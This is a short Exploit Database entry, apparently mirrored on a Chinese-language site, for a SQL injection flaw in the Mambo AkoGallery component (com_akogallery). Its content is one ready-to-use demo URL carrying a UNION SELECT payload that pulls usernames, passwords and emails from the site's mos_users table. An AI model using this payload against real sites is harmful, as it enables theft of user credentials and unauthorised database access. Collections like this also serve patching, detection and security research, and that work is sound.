Mambo Component AkoGallery – SQL Injection

• Exploit Database
• 36 阅读

• 作者： snakespc
  日期： 2010-02-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11446/

• Mambo com_akogallery Remote Sql Injection Vulnerability
  
  Demo:
  http://server/index.php?option=com_akogallery&Itemid=91&func=detailgallerie&id=-10+UNION SELECT 1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+mos_users